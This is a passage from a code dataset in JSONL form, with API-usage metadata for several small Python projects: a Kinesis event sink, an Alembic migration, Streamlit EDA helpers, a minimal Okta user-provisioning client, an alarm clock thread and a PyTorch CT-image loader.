"flask.redirect", "line_number": 103, "usage_type": "call"}, {"api_name": "flask.request.referrer", "line_number": 103, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 103, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 104, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 104, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 105, 
"usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 106, "usage_type": "call"}, {"api_name": "src.views.BaseView", "line_number": 109, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 112, "usage_type": "name"}, {"api_name": "src.user.forms.ProfileForm", "line_number": 113, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 117, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 117, "usage_type": "call"}, {"api_name": "werkzeug.datastructures.MultiDict", "line_number": 118, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 125, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 128, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 128, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 130, "usage_type": "call"}, {"api_name": "src.user.models.User.query.filter_by", "line_number": 131, "usage_type": "call"}, {"api_name": "src.user.models.User.query", "line_number": 131, "usage_type": "attribute"}, {"api_name": "src.user.models.User", "line_number": 131, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 131, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 132, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 132, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 133, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 133, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 133, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 134, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 134, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 135, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 135, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 135, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 137, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 137, "usage_type": "call"}, {"api_name": "src.views.BaseView", "line_number": 140, "usage_type": "name"}, {"api_name": "src.user.forms.ProfileOAuthForm", "line_number": 145, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 146, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 149, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 149, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 151, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 152, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 152, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 152, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 153, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 153, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 153, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 154, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 154, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 154, "usage_type": "name"}, {"api_name": 
"flask.request.form.get", "line_number": 155, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 155, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 155, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 156, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 156, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 156, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 168, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 168, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 168, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 169, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 169, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 169, "usage_type": "name"}, {"api_name": "src.user.models.User.hash_password", "line_number": 170, "usage_type": "call"}, {"api_name": "src.user.models.User", "line_number": 170, "usage_type": "name"}, {"api_name": "src.user.models.User.query.filter_by", "line_number": 174, "usage_type": "call"}, {"api_name": "src.user.models.User.query", "line_number": 174, "usage_type": "attribute"}, {"api_name": "src.user.models.User", "line_number": 174, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 175, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 176, "usage_type": "call"}, {"api_name": "src.user.models.User.query.filter_by", "line_number": 182, "usage_type": "call"}, {"api_name": "src.user.models.User.query", "line_number": 182, "usage_type": "attribute"}, {"api_name": "src.user.models.User", "line_number": 182, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 183, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 184, "usage_type": "call"}, {"api_name": "src.user.models.User.query.filter_by", "line_number": 189, "usage_type": "call"}, {"api_name": "src.user.models.User.query", "line_number": 189, "usage_type": "attribute"}, {"api_name": "src.user.models.User", "line_number": 189, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 190, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 190, "usage_type": "call"}, {"api_name": "werkzeug.datastructures.MultiDict", "line_number": 194, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 203, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 205, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 205, "usage_type": "call"}, {"api_name": "flask.views.MethodView", "line_number": 208, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 210, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 210, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 212, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 212, "usage_type": "call"}, {"api_name": "flask.views.MethodView", "line_number": 215, "usage_type": "name"}, {"api_name": "src.user.models.User.verify_token_for_mail_aproved", "line_number": 222, "usage_type": "call"}, {"api_name": "src.user.models.User", "line_number": 222, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 224, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 224, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 225, "usage_type": 
"call"}, {"api_name": "flask.url_for", "line_number": 225, "usage_type": "call"}, {"api_name": "flask.views.MethodView", "line_number": 228, "usage_type": "name"}, {"api_name": "src.user.forms.ResendEmailForm", "line_number": 233, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 236, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 236, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 238, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 239, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 239, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 239, "usage_type": "name"}, {"api_name": "src.user.models.User.query.filter_by", "line_number": 241, "usage_type": "call"}, {"api_name": "src.user.models.User.query", "line_number": 241, "usage_type": "attribute"}, {"api_name": "src.user.models.User", "line_number": 241, "usage_type": "name"}, {"api_name": "src.mailers.send_mail.send_mail_for_aprove", "line_number": 243, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 244, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 246, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 248, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 249, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 249, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 252, "usage_type": "call"}, {"api_name": "src.views.BaseView", "line_number": 255, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 258, "usage_type": "name"}, {"api_name": "src.user.forms.ChangeAvatarForm", "line_number": 259, "usage_type": "name"}, {"api_name": "werkzeug.datastructures.MultiDict", "line_number": 267, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 272, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 276, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 276, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 276, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 278, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 278, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 278, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 279, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 279, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 279, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 283, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 283, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 283, "usage_type": "name"}, {"api_name": "src.user.models.User.query.filter_by", "line_number": 286, "usage_type": "call"}, {"api_name": "src.user.models.User.query", "line_number": 286, "usage_type": "attribute"}, {"api_name": "src.user.models.User", "line_number": 286, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 286, "usage_type": "name"}, {"api_name": "src.extensions.db.session.commit", "line_number": 290, "usage_type": "call"}, {"api_name": "src.extensions.db.session", "line_number": 290, "usage_type": "attribute"}, {"api_name": "src.extensions.db", "line_number": 290, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 
292, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 292, "usage_type": "call"}, {"api_name": "src.user.decorators.login_required", "line_number": 297, "usage_type": "call"}, {"api_name": "src.user.decorators.login_required", "line_number": 320, "usage_type": "call"}, {"api_name": "src.user.decorators.login_required", "line_number": 328, "usage_type": "call"}]} +{"seq_id": "9039106437", "text": "import boto3\nimport json\nfrom botocore.exceptions import ClientError\nfrom event.processing import get_events_from\nfrom utils.config import AWS_CONF\nfrom utils.logger import init_logger\n\nlog = init_logger(__name__)\n\nclass EventSink(object):\n\n def __init__(self, endpoint_url, stream_name):\n self.client = boto3.client('kinesis', config=AWS_CONF, endpoint_url=endpoint_url, verify=False)\n self.stream_name = stream_name\n\n def put_to_stream(self, payload, event_type):\n \"\"\"\n function used to submit a record to Kinesis stream, with retry in case of failure\n \"\"\"\n while True:\n try:\n log.debug(f\"PutRecord with event_id {payload['event_id']} of type [{event_type}] to Kinesis\")\n self.client.put_record(StreamName=self.stream_name, Data=json.dumps(payload), PartitionKey=event_type)\n break\n except ClientError:\n log.debug(\"`PutRecord` to Kinesis stream failed, retrying...\")\n\n def send(self, submission):\n \"\"\"\n implements submission of separate event types to their respective shards\n \"\"\"\n for event_type in ['new_process', 'network_connection']:\n for event in get_events_from(submission, event_type):\n self.put_to_stream(event, event_type)\n", "repo_name": "florianakos/sqs-to-kinesis-processor", "sub_path": "event_processor/kinesis/sink.py", "file_name": "sink.py", "file_ext": "py", "file_size_in_byte": 1322, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "utils.logger.init_logger", "line_number": 8, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 13, "usage_type": "call"}, {"api_name": "utils.config.AWS_CONF", "line_number": 13, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 23, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 25, "usage_type": "name"}, {"api_name": "event.processing", "line_number": 33, "usage_type": "name"}, {"api_name": "event.processing.get_events_from", "line_number": 33, "usage_type": "call"}, {"api_name": "event.processing", "line_number": 34, "usage_type": "argument"}]} +{"seq_id": "74995538113", "text": "\"\"\"Add cache.description\n\nRevision ID: a0ebc6df70c4\nRevises: eb768171dcce\nCreate Date: 2021-10-07 17:30:05.325333\n\n\"\"\"\n\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic\nrevision = \"a0ebc6df70c4\"\ndown_revision = \"eb768171dcce\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column(\"caches\", sa.Column(\"description\", sa.Text(), nullable=True))\n op.execute(\"UPDATE caches SET description = 'DEFAULT DESCRIPTION'\")\n with op.batch_alter_table(\"caches\", schema=None) as batch_op:\n batch_op.alter_column(\"description\", nullable=False)\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column(\"caches\", \"description\")\n # ### end Alembic commands ###\n", "repo_name": "everycache-group/everycache-app", "sub_path": "api/everycache_api/migrations/versions/a0ebc6df70c4_add_cache_description.py", "file_name": "a0ebc6df70c4_add_cache_description.py", "file_ext": "py", "file_size_in_byte": 866, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.Text", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.execute", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "alembic.op.batch_alter_table", "line_number": 23, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 23, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 31, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "15628360896", "text": "import pandas as pd\r\nimport streamlit as st \r\nimport altair as alt \r\nimport plotly.graph_objects as go\r\nimport plotly.figure_factory as ff\r\n# tda magic\r\nfrom gtda.mapper.filter import Projection\r\nfrom gtda.mapper.cover import OneDimensionalCover, CubicalCover\r\nfrom gtda.mapper.pipeline import make_mapper_pipeline\r\nfrom gtda.mapper.visualization import plot_static_mapper_graph, plot_interactive_mapper_graph\r\nfrom sklearn.cluster import DBSCAN\r\nfrom PIL import Image\r\n\r\nst.markdown('', unsafe_allow_html=True)\r\nst.markdown('', unsafe_allow_html=True)\r\n\r\ndef show_image(image, caption=None, width=500):\r\n img = Image.open(image)\r\n st.image(img, caption=caption, use_column_width=False, width=width)\r\n return \r\ndef status_decorator(func):\r\n def wrapper(*args, **kwargs):\r\n status = st.empty()\r\n status.text('Loading function %s' % func.__name__)\r\n out = func(*args, **kwargs)\r\n status.text('Done Loading function %s' % func.__name__)\r\n return out \r\n return wrapper\r\ndef print_decorator(txt):\r\n #st.markdown('''----''')\r\n st.markdown('', unsafe_allow_html=True)\r\n st.markdown('', unsafe_allow_html=True)\r\n st.markdown(f'''> ## {txt}''')\r\n #st.markdown('''----''')\r\n return\r\n\r\n@status_decorator\r\n@st.cache(allow_output_mutation=True)\r\ndef read_dat(data_file, sep=None, nrows=100, **kwargs):\r\n if not sep:\r\n sep='\\t|,|;'\r\n else:\r\n sep=sep+'|'+'\\t|,|;'\r\n return pd.read_csv(data_file, sep=sep, nrows=nrows, engine='python', **kwargs)\r\n\r\ndef get_dtypes(df):\r\n '''return column data types of a dataframe '''\r\n cols = dict({})\r\n data_types = [ 'int64', 'float64', 'bool', 'object' ]\r\n for dtype in data_types:\r\n filter = df.select_dtypes(include=dtype).columns.values\r\n #st.write(filter)\r\n if len(filter)>0:\r\n cols.update({dtype: filter})\r\n \r\n num_cols = []\r\n cat_cols = []\r\n\r\n for key, val in cols.items():\r\n if key == 'float64':\r\n num_cols.extend(val)\r\n elif key == 'int64':\r\n for cat in val:\r\n unique = len(df[cat].unique())/len(df[cat])\r\n if unique > 0.1 or len(df[cat].unique())>100:\r\n num_cols.append(cat)\r\n else:\r\n cat_cols.append(cat)\r\n if key == 'object':\r\n cat_cols.extend(val)\r\n return cols, num_cols, cat_cols\r\n\r\ndef plot_hist(df, select_row, classes, dep_var):\r\n 
c1=[]\r\n c2=[]\r\n c3=[]\r\n \r\n c1 =alt.Chart(df, height=200, width=200).mark_bar(opacity=0.4, color='#EB6638').encode(\r\n alt.X(select_row, bin=True), y=alt.Y('count()', scale=alt.Scale(type='log'), axis=alt.Axis(title='Den'))).interactive()\r\n \r\n c2 = alt.Chart(df, height=200, width=200).transform_density(\r\n select_row, counts=True, as_=[select_row, 'density']).mark_area(opacity=0.4, color='#38EB89').encode(\r\n alt.X(select_row, axis=alt.Axis()), y=alt.Y('density:Q', axis=alt.Axis(title=None))).interactive()\r\n c3 = alt.Chart(df, height=200, width=200).transform_density(select_row, counts=True, cumulative=True, \r\n as_=[select_row, 'density']).mark_area(opacity=0.4, color='#38E0EB').encode(\r\n alt.X(select_row, axis=alt.Axis()), y=alt.Y('density:Q', axis=alt.Axis(title=None))).interactive()\r\n \r\n return [c1, c2, c3]\r\n\r\n# make a single row\r\n\r\ndef make_hcc(row_of_charts):\r\n hconcat = [chart for chart in row_of_charts]\r\n hcc = alt.HConcatChart(hconcat=hconcat, bounds='flush', spacing=40.)\r\n return hcc\r\n\r\n# take an array of charts and produce a facet grid\r\n\r\ndef facet_wrap(charts, charts_per_row):\r\n rows_of_charts = [\r\n charts[i:i+charts_per_row] \r\n for i in range(0, len(charts), charts_per_row)] \r\n vconcat = [make_hcc(r) for r in rows_of_charts] \r\n vcc = alt.VConcatChart(vconcat=vconcat, padding={'left':20, 'top':5}, spacing=40)\\\r\n .configure_axisX(grid=True)\\\r\n .configure_axisY(grid=True)\r\n return vcc\r\n\r\ndef box_plot(df, cols):\r\n fig = go.Figure()\r\n for col in cols:\r\n fig.add_trace(go.Violin(y=df[col],\r\n name=col,\r\n box_visible=True,\r\n meanline_visible=True))\r\n fig.update_layout(title='Box and Violin Plots')\r\n return fig\r\n \r\n\r\ndef plotly_hist(df, cols, log=False):\r\n fig = ff.create_distplot([df[c] for c in cols], cols , bin_size=.2)\r\n if log:\r\n fig.update_layout(xaxis_type=\"log\", yaxis_type=\"log\", title='Histogram/Density Plot')\r\n else:\r\n fig.update_layout(title='Histogram/Density Plot')\r\n return fig\r\n\r\n@st.cache\r\ndef plot_mapper(df, color):\r\n pipeline = make_mapper_pipeline(\r\n filter_func=Projection(columns=2),\r\n cover=OneDimensionalCover(),\r\n clusterer=DBSCAN(),\r\n )\r\n return plot_static_mapper_graph(pipeline, df.values, layout_dim=2, \r\n color_variable=color, color_by_columns_dropdown=True)\r\n\r\n@st.cache\r\ndef summarize_cat(series):\r\n counts = series.value_counts()\r\n unique = len(counts.keys())\r\n\r\n popular = pd.Series({key: val for key, val in counts.items() if val >2 })\r\n\r\n return unique, popular, counts", "repo_name": "Vikramardham/eda-app", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 5320, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "streamlit.markdown", "line_number": 14, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 15, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 18, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 18, "usage_type": "name"}, {"api_name": "streamlit.image", "line_number": 19, "usage_type": "call"}, {"api_name": "streamlit.empty", "line_number": 23, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 31, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 32, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.read_csv", 
"line_number": 44, "usage_type": "call"}, {"api_name": "streamlit.cache", "line_number": 38, "usage_type": "call"}, {"api_name": "altair.Chart", "line_number": 78, "usage_type": "call"}, {"api_name": "altair.X", "line_number": 79, "usage_type": "call"}, {"api_name": "altair.Y", "line_number": 79, "usage_type": "call"}, {"api_name": "altair.Scale", "line_number": 79, "usage_type": "call"}, {"api_name": "altair.Axis", "line_number": 79, "usage_type": "call"}, {"api_name": "altair.Chart", "line_number": 81, "usage_type": "call"}, {"api_name": "altair.X", "line_number": 83, "usage_type": "call"}, {"api_name": "altair.Axis", "line_number": 83, "usage_type": "call"}, {"api_name": "altair.Y", "line_number": 83, "usage_type": "call"}, {"api_name": "altair.Chart", "line_number": 84, "usage_type": "call"}, {"api_name": "altair.X", "line_number": 86, "usage_type": "call"}, {"api_name": "altair.Axis", "line_number": 86, "usage_type": "call"}, {"api_name": "altair.Y", "line_number": 86, "usage_type": "call"}, {"api_name": "altair.HConcatChart", "line_number": 94, "usage_type": "call"}, {"api_name": "altair.VConcatChart", "line_number": 104, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 110, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 110, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Violin", "line_number": 112, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 112, "usage_type": "name"}, {"api_name": "plotly.figure_factory.create_distplot", "line_number": 121, "usage_type": "call"}, {"api_name": "plotly.figure_factory", "line_number": 121, "usage_type": "name"}, {"api_name": "gtda.mapper.pipeline.make_mapper_pipeline", "line_number": 130, "usage_type": "call"}, {"api_name": "gtda.mapper.filter.Projection", "line_number": 131, "usage_type": "call"}, {"api_name": "gtda.mapper.cover.OneDimensionalCover", "line_number": 132, "usage_type": "call"}, {"api_name": "sklearn.cluster.DBSCAN", "line_number": 133, "usage_type": "call"}, {"api_name": "gtda.mapper.visualization.plot_static_mapper_graph", "line_number": 135, "usage_type": "call"}, {"api_name": "streamlit.cache", "line_number": 128, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 143, "usage_type": "call"}, {"api_name": "streamlit.cache", "line_number": 138, "usage_type": "attribute"}]} +{"seq_id": "38856072431", "text": "\"\"\"A minimal wrapper for the Okta API.\nhttp://developer.okta.com/docs/api/getting_started/design_principles.html\n\nThe offical python client from okta appears to be abandoned ( https://github.com/okta/oktasdk-python/issues )\nso this wrapper only implements the bare minimum we require\n\"\"\"\n\nfrom posixpath import join as urljoin\nimport json\nimport requests\n\n\nclass OktaError(RuntimeError):\n \"\"\"This exception is raised when the Okta API returns a status code >= 400\n\n Attributes:\n response: The full response object from requests that was returned\n error: The body of the response json decoded\n\n Args:\n response: The full response object that is causing this exception to be raised\n\n \"\"\"\n def __init__(self, response):\n self.response = response\n self.error = json.loads(response.text)\n\n try:\n # make our value, the first problem cause if it exist\n message = self.error['errorCauses'][0]['errorSummary']\n except (KeyError, IndexError):\n # if not, then use the generic (usually less helpful) summary\n message = self.error['errorSummary']\n\n super(OktaError, 
self).__init__(message)\n\n\nclass OktaClient(object):\n \"\"\"A minimal client for the Okta API\n\n Args:\n base_url: The URL to your Okta instance\n token: An API Token to authenticate\n http://developer.okta.com/docs/api/getting_started/getting_a_token.html\n api_version: The version of the API to use.\n Currently only 'v1' is supported\n \"\"\"\n def __init__(self, base_url, token, api_version='v1'):\n self.base_url = base_url\n self.token = token\n self.api_version = api_version\n\n def _request(self, resource, method, body=None):\n \"\"\"Make a request to the Okta API.\n\n Args:\n resource: The API method you wish to call (example: '/users')\n method: The method to use when making the request GET/POST/etc\n body (optional): An json encodeable object which will be included as the body\n of the request\n\n Raises:\n OktaError: An error occured making the request\n\n Returns:\n dict: The parsed json response\n\n \"\"\"\n # build our URL from all the pieces given to us\n endpoint = urljoin(\n self.base_url,\n 'api',\n self.api_version,\n resource.lstrip('/')\n )\n\n # convert 'POST' to requests.post\n requests_method = getattr(requests, method.lower())\n\n # make the request\n response = requests_method(\n endpoint,\n json=body,\n headers={\n 'Authorization': 'SSWS ' + self.token\n }\n )\n\n # if we errored raise an exception\n if response.status_code >= 400:\n raise OktaError(response)\n\n # return the response\n return json.loads(response.text)\n\n def new_user(self, email, first_name, last_name):\n \"\"\"Create a new user with minimal details\n\n Args:\n email: The email address (and login) for this user\n first_name: The first name for the user\n last_name: The last name for the user\n\n Raises:\n OktaError: There was an error creating the user\n\n Returns:\n dict: An object describing the created user\n\n \"\"\"\n okta_user = {\n 'profile': {\n 'email': email,\n 'login': email,\n 'firstName': first_name,\n 'lastName': last_name\n }\n }\n\n return self._request('/users', 'POST', body=okta_user)\n\n def provision_user(self, user):\n \"\"\"Create a user and return the URL to the created resource\n\n Args:\n user(dict): A dict in the format returned by a call to uaapp.clients.uaa.UAAClient.get_user()\n\n Raises:\n OktaError: There was an error creating the user\n\n Returns:\n str: The url to the created resource\n\n \"\"\"\n\n try:\n first_name = user['name']['givenName']\n if not first_name:\n raise KeyError\n except KeyError:\n first_name = user['userName'].split('@', 1)[0]\n\n try:\n last_name = user['name']['familyName']\n if not last_name:\n raise KeyError\n except KeyError:\n last_name = user['userName'].split('@', 1)[1]\n\n try:\n # create the user in okta\n okta_user = self.new_user(user['userName'], first_name, last_name)\n user_id = okta_user['id']\n except OktaError as exc:\n # this is gross, but Okta returns the same error for all validation fails\n # If the user is already in Okta under this email, we'll consider them migrated\n # TODO: Validate this decision\n\n if str(exc) == 'login: An object with this field already exists in the current organization':\n user_id = user['userName']\n else:\n raise\n\n return urljoin(\n self.base_url,\n 'api',\n self.api_version,\n 'users',\n user_id\n )\n", "repo_name": "cnelson/uaapp", "sub_path": "uaapp/clients/okta.py", "file_name": "okta.py", "file_ext": "py", "file_size_in_byte": 5250, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "json.loads", 
"line_number": 26, "usage_type": "call"}, {"api_name": "posixpath.join", "line_number": 70, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 94, "usage_type": "call"}, {"api_name": "posixpath.join", "line_number": 164, "usage_type": "call"}]} +{"seq_id": "37858687746", "text": "from time import sleep\nfrom typing_extensions import Self\nimport datetime as dt\nfrom packages.thread import Thread\nimport pyttsx3\n\nglobal speech_engine\nspeech_engine = pyttsx3.init()\n\ndef calc_duration(end_time: dt.time, start_time: dt.time):\n return (end_time.hour - start_time.hour) * 60 * 60 +\\\n (end_time.minute - start_time.minute) * 60 +\\\n (end_time.second - start_time.second)\n\nclass Alarm(Thread):\n def __init__(self, id: int, end_time: dt.time):\n def cb(duration):\n for o in range(duration):\n sleep(1)\n else:\n for _ in range(3):\n speech_engine.say(\"ALARM\")\n speech_engine.runAndWait()\n self.stop()\n super().__init__(cb)\n self.end_time = end_time\n self.id = id\n\n def activate(self: Self) -> None:\n self.args = [self.duration]\n self.start()\n def deactivate(self: Self) -> None:\n self.stop()\n @property\n def duration(self: Self) -> int:\n start_time = dt.datetime.now().time()\n return calc_duration(self.end_time, start_time)\n @property\n def end_time(self: Self) -> dt.time:\n return self._end_time\n @end_time.setter\n def end_time(self: Self, new: dt.time) -> None:\n if new < dt.datetime.now().time():\n raise ValueError()\n self._end_time = new", "repo_name": "HamedMolavi/pyClock", "sub_path": "packages/alarm.py", "file_name": "alarm.py", "file_ext": "py", "file_size_in_byte": 1411, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pyttsx3.init", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 10, "usage_type": "attribute"}, {"api_name": "packages.thread.Thread", "line_number": 15, "usage_type": "name"}, {"api_name": "datetime.time", "line_number": 16, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 19, "usage_type": "call"}, {"api_name": "typing_extensions.Self", "line_number": 29, "usage_type": "name"}, {"api_name": "typing_extensions.Self", "line_number": 32, "usage_type": "name"}, {"api_name": "typing_extensions.Self", "line_number": 35, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 36, "usage_type": "attribute"}, {"api_name": "typing_extensions.Self", "line_number": 39, "usage_type": "name"}, {"api_name": "datetime.time", "line_number": 39, "usage_type": "attribute"}, {"api_name": "typing_extensions.Self", "line_number": 42, "usage_type": "name"}, {"api_name": "datetime.time", "line_number": 42, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 43, "usage_type": "attribute"}]} +{"seq_id": "27618882504", "text": "import numpy as np\nimport pandas as pd\nimport cv2\nfrom sampling import sample\n\n\nfrom torch.utils.data import Dataset, DataLoader, Subset\n\n# For validation\nclass SeriesLoader(Dataset):\n def __init__(self, data_csv, args):\n self.imgs = data_csv[\"Image\"].values\n self.labels = data_csv[\"Label\"].values\n\n chosen_slices = sample(args, len(self.imgs))\n self.imgs = self.imgs[chosen_slices]\n self.labels = self.labels[chosen_slices]\n\n def __len__(self):\n return len(self.imgs)\n\n def 
__getitem__(self, idx):\n        data_dir = \"../Split_data\"\n        img_path = f\"{data_dir}/{self.imgs[idx]}\"\n        img = cv2.imread(img_path)\n        img = img.transpose(2, 0, 1)\n        label = self.labels[idx]\n\n        # Augmentation\n\n        return img, label\n\n\ndef build_dataloader(data_csv, args, debug=False):\n    \"\"\"\n    Build dataloader\n\n    Returns:\n        dataloader: Dataloader object\n    \"\"\"\n\n    dataset = SeriesLoader(data_csv, args)\n    # DEBUG: Only take a subset of dataloader to run script\n    if debug:\n        dataset = Subset(dataset, np.random.choice(np.arange(len(dataset)), 64))\n\n    dataloader = DataLoader(\n        dataset, 64, pin_memory=False, shuffle=True, drop_last=False, num_workers=8\n    )\n    return dataloader\n", "repo_name": "vinbigdata-medical/MIDL2021-CT-Classification", "sub_path": "study_evaluation/series_loader.py", "file_name": "series_loader.py", "file_ext": "py", "file_size_in_byte": 1268, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 10, "usage_type": "name"}, {"api_name": "sampling.sample", "line_number": 15, 